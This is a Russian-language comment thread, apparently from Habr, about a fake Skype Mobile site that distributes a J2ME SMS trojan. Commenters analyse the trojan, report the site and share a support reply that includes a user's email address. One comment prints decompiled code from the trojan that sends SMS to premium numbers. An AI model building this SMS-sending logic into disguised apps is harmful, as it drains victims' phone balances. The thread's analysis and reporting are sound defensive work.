Pull to refresh

Comments 74

Ну, до меня дошло только после после запуска инсталлятора и вопроса системы — разрешать ли приложению отправлять SMS. На скотски сделанный сайт не обратил внимание — спешил быстрее что-то найти, про 23 Кб подумал, что инсталлятор будет качать остальное из сети. Слоупок, да.
>Звонки через Skype из любой точки мира¹ – соединение с сетью WiFi
или 3G не требуется.
мдя, звонки через скайп с телефона :)
Вас смущает скайп на коммуникаторе? Меня почему-то нет.
На коммуникаторе Windows Mobile, к примеру. Там полноценное WinAPI. Ничего не смущает.
Не правильно. Правда я не обмолвился о размере.
Ну, вот и замена SMS шпионам:)
ага. еще можно постучать головой о стену бункера… эффект примерно тот же
Телефон вроде спрашивает о доступе к SMS, или нет?
* точнее в некоторых просто можно в настройках явы поставить опцию «можно всё» и он больше никогда ничего не спросит
Так это, вроде, только для подписанных сертификатом приложений?
Нокиа например не полволяет для неподписанных приложени ставить настройку «всегда разрешать». Меня лично это бесит, но в общем применительно к среднестатистическому пользователю это правильно.

А вообще, я думаю, что 90% пользователей телефонов не нужен Ява-функционал (как и ВАП, Sim-меню) и прочая зараза, которую производители в сговоре с операторами им подсовывют с целью развода на деньги.
На счет того, как проучить мошенников, на мой взгляд самый лучший вариант это написать непосредственно в тп скайпа. Ибо никто так сильно не захочет прикрыть эту «лавочку» как сами разработчики. Тем более возможностей у них намного больше чем у большинства.
p.s. пойду общаться с техподдержкой.
Да уж… воистину ява универсальна и для айфонов, и для симбиана, и для винмобайла — всё один файл skypeMobile.jar :) Лишь бы скачали…
особенно с учетом что на iphone нет java (без джейла).
Наоборот :) Без джейла есть, а с джейлом нет ))
Сейчас уже начали любой телефон с тачскрином называть айфоном (как любой mp3-плеер — айпод), поэтому во многих случаях сработает.
Спасибо, сам по всем закладкам прошёлся кроме Help.
Уже заблокировали
Друзья — официальный сайт понадежнее будет
Хм… Не знаю у кого как, но у меня всегда по умолчанию стоит запрет на отправку сообщений из приложений. Я считаю, это лучшая защита. Ну а если уж пользователь сам нажал «Разрешить», то это смс-ка стоимостью 50-300 р, достаточная кара за глупость
UFO just landed and posted this here
Вы считаете что Firefox основной браузер и блокировка в нём данного сайта — решение всех проблем? Вы бы ещё предложили написать производителю телефона.
Нужно написать в Гугл, хостеру и регистратору.
Речь не об этом, а о том что надо распиарасить паразитов :) Даже если и не самим лезть в драку, так хотя бы позвонить в милицию.
UFO just landed and posted this here
Firefox использует гугловскую систему предотвращения мошенничества.
То есть в Гугл сообщить проще всего из ff — нажимаешь, потом вводишь капчу, и всё готово.
Что не отменяет возможность/необходимость написать хостеру.
Не знал что ff как то связан с Гугл.
Долгое время Гугл был основным спонсором разработки firefox.

А кнопку эту я собственноручно тыкал неделю назад на каком-то очередном vkontakle.ru
FIREFOX: Справка — Сообщите о мошенническом веб-сайте — как раз и отправляет информацию в Гугл, вы бы сами попробовали перед тем как умничать.
Я не пользуюсь браузером Firefox.
Вы сейчас не умничаете?
Тогда может стоило промолчать?
Вы сам с собой разговариваете?
Не нужно меня учить. Без ваших советов обойдусь.
UFO just landed and posted this here
Вы уже внесли свою лепту, у меня в гугле на запрос «skype windows mobile 6.3» этот пост вылетает вторым. А там синим по белому написано «Мошенники».
а самого сайта на первых нескольких страницах уже нет (или нет вообще)
Написал в тп скайпа. будем ждать ответа.
Правда русскоговорящей поддержки у них нет.
Ну уж обфусканный код они, наверняка поймут…
security team уже осведомлена, думаю, скоро сайт окончательно прикроют
На деле скачивается не клиент Skype, а приложение Java (23 Кб), которое в поддельном «процессе инсталляции» рассылает SMS на левые короткие номера, в результате чего с вашего счета снимаются деньги.

skypeMobile.jar 383 КБ?
красивые скриншоты, но это не фишинговый сайт
Ну если народ подаст много жалоб то он будет в фишинг базе… и исчезнет из поиска
Особенно впечатлило что оно отправляет на туже страницу что и Лиса. и обзывает там мой Хром Лисой xDDD
Но тут нет кнопки «Отправить»!
При попытке загрузки любого из приложений:
Антивирус Касперского 6.0 для Windows Workstations

The requested URL mjava.mobi/11565/Skype_Mobile.jar is infected with Trojan-SMS.J2ME.Agent.l virus

А сообщения о фишинговых сайтах через браузеры обычно не до чего не доводят…
Откуда этот дистр? у меня качается skype-mobile.net/skypeMobile.jar 383 КБ

А в вашем, если покопаться jar'е, в m.class можно найти такие строчки

messageconnection_1 = ((MessageConnection) Connector.open(new StringBuffer().append(«sms://»).append(b[int_1]).toString()));
TextMessage textmessage_1 = ((TextMessage) ((MessageConnection) Connector.open(new StringBuffer().append(«sms://»).append(b[int_1]).toString())).newMessage(«text»));
textmessage_1.setAddress(new StringBuffer().append(«sms://»).append(b[int_1]).toString());
textmessage_1.setPayloadText(a[int_1]);
System.out.println("===> test start send");
messageconnection_1.send(textmessage_1);
System.out.println("===> send ok");

Таки да, что он отсылает. Получается Касперыч декомпилирует java классы и палит код?
:) касперский просто уже знает сигнатуру файла
Откуда этот дистр?

Просто перешел по одной из ссылок, видимо там было перенаправление…
Скачалось такое же приложение, 383 КБ. По виду — обычный скайповский ява-апплет. На сенсорном экране не могу протестить — не реагирует.

Если кто-то отправил сообщение с троянского приложения — очень прошу скинуть мне информацию об отправленном сообщении. (нужен короткий номер и отправленный текст, всё должно быть в исходящих сообщениях) По возможности — можно указать свой номер телефона.

Я работаю в МегаФоне, связывался с нашими специалистами, которые занимаются блокировкой мошеннических номеров.
На будущее — эти Ява-приложения слеплены обычно топорно, так что номер и сообщение отсылаемое хранятся внутри в конфиге (простом текстовом файле), так что не декомпилируя приложение, можно понять, что оно делает :)

По крайней мере, те, на которые я натыкался, не пытались ничего скрыть или зашифровать. Подозреваю, скоро школьники начнут менять код, чтобы не палиться антивирусами.
Спасибо за «на будущее», но, как я уже сказал, мне скачалось обычное ява-приложение, подписанное скайпом, так что я бы с радостью посмотрел описываемый Вами конфиг, но его нет.
.jar — это ZIP по натуре, так что переименуйте в .zip и откройте его WinRAR'ом :) Ну или если у вас Тотал Коммандер, просто жмите Ctrl + PgDn — он вроде при этом откроет его как архив. Там где-то и лежит конфиг.

Ну и плюс в файлах *.class (компилированный ява-код) можно будет увидеть строчки типа «sms», «MessageConnection» и т.д.
Вы исходную тему читали?! У меня скачивается не «троянское приложение» размером 24 кб, а Skype-клиент размером 383 КБ. Ок?!
Ок, понял) Видимо авторы сайта уже поменяли ссылку на скачивание.
И все же отправил через фаерфокс! ) я думаю обратят внимание если будет пару десятков жалоб
Грустно… Когда ж мы уже будем жить в мире, в котором человек здравый и трезвый не будет задумываться, как прищучить мошейника, а спокойно пойдет себе с этим в свое местное отделение милиции и будет уверен, что уж там-то точно разберутся… :) Вне зависимости от того, где эти нехорошие люди хостятся и в какой зоне у них домен…

Мечты мечты…
У, да этому лохотрону уже несколько мнсяцев. Трансформируется только под разные программы и приложения. Зайдите в Гугл и наберите Jimm — и попробуйте что-нибудь скачать из предложенного в адвордсе. Результат будет тот же — пойдут СМС на разные номера.
Если кто-то (вдруг!) отправил смс — посмотрите в детальке короткий номер и пришлите, пожалуйста, мне.
По крайней мере, со стороны одного оператора прикроем.
Не выйдет. Этот номер юзают тысячи честных клиентов смс-биллингов.
Отличаются только коды, что на него отправляются.
Нужна, естественно, не только информация по коротким номерам. Но большую часть её уже взял из топика и по ссылке с мошеннического сайта. Есть специально обученные люди, которые выяснят, какие коды отправляет приложение и заблокируют именно мошенников. Инфо я уже передал.
Для обладателей FF и IE могу порекомендовать ознакомиться с местными топиками mihteh.habrahabr.ru/blog/40192/ и shifttstas.habrahabr.ru/blog/72045/

Цитата из одного из данных топиков:

«WOT – это сообщество, посвятившее себя поддержке безопасного использования Интернета. Название является сокращением от «Web of Trust» (Сеть доверия). Цель – сделать Интернет безопаснее, позволив пользователям обмениваться опытом, связанным с веб-сайтами и предлагаемыми ими услугами.»
> Если кто-то может посоветовать, каким образом лучше прищучить мошенников — пишите в комментариях.

Прищучить сотовых операторов и аггрегаторов, но вы же понимаете. насколько это маловероятно.
офф ответ от тех.поддержки скайп

Original Message Follows:
— Name: Anatoliy Mladshev
Skype Name: mladshev.a
E-mail: mladshev.a@gmail.com
Topic: Skype Products (Skype for SIP, Subscriptions, Online
number, SMS, Voicemail, etc.)
Subtopic: Extras (games, productivity, business, etc.)
Subject: skype fake site.
Message:

— Good day, dear developers.
Here's the problem.
We founded the site, where people can download fake skype product
skype-mobile.net
It steals money from users moblie phone.
Can u do some thing with that? It can the big problem for your
reputation.

Hello Anatoliy,

Thank you for contacting Skype Support.

Thank you for reporting this site.

The site that you have provided is now under investigation.

We appreciate your vigilance and thank you for your feedback.

If you'd like to get more out of Skype, check out our great call
packages — www.skype.com/go/getmore/

Should you need more assistance, feel free to contact us again; we will
be glad to help.

Best regards,

Gabriella

Skype Customer Support

Visit www.skype.com for latest news, updates and tips.
Sign up to leave a comment.

Articles